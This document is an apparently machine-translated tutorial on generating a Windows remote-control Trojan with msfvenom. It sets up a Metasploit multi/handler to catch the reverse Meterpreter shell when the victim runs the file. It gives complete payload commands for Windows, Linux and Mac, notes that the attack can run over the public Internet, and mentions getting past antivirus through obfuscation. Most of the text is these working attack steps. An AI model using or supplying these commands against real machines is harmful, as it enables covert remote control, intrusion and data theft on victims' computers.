metasploit framework kali linux is one of the best penetration framework, today records about the use of kali generation process windows remote control Trojan
Tool generates payload using MSFVenom, it will show the basic parameters then we enter msfvenom
Here we do not set the parameters, so the first row there was a mistake
Here we mainly talk about the windows of the generation and use of payloads, in which we see already the fifth line gives an example of a generation payload of this example is to generate a Trojan horse under windwos
which is:
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
The examples given there did not write the port number, we modify it to be the following:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe
LHOST kali is your ip address, LPORT just want to let kali monitor with which port to listen for the shell, and then output the generated exe file to the current directory Cl0ud.exe
I'm here kali is the network address: 10.10.10.128, listener port is 1234
Let's open metasploit frame, enter msfconsole:
Then use msfvenom generate Cl0ud.exe Trojan:
Now we can see the folder has been generated Cl0ud.exe Trojan
Put it on my desktop on the host windows10
Then we have to use the back door to a module configured a rebound session handler, called the exploit / multi / handler
use exploit / multi / handler enabled:
We set the listening port and host IP, with the same attention to the need to set up inside the payload set here:
Then we set the payload, ie,
set payload windows/meterpreter/reverse_tcp
Now deployed kali above is completed, we enter exploit, listen
This time on the waiting kali windows host someone clicks Cl0ud.exe, so you get shell
At this point there has been acquired shell, we enter sysinfo view system information, it has seen success
After obtaining permission to rest is up to your own operate.
The environment is a network environment, if you want to kali generation payload capable of using the public Internet, the network changed the kali bridge mode, use a different card with the host on it, resulting in the Trojans also have the same public network effects.
In addition, if you have anti-virus software in the windows above, it may detect that this is a Trojan horse file generating a prompt, we can also Cl0ud.exe further confusion and encryption at the time of generation, bypassing antivirus software so as to achieve recognition the purpose of direct getshell (confused encryption to bypass the next write it, mostly lazy)
Then there are generated payload command in some other environment, as follows:
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho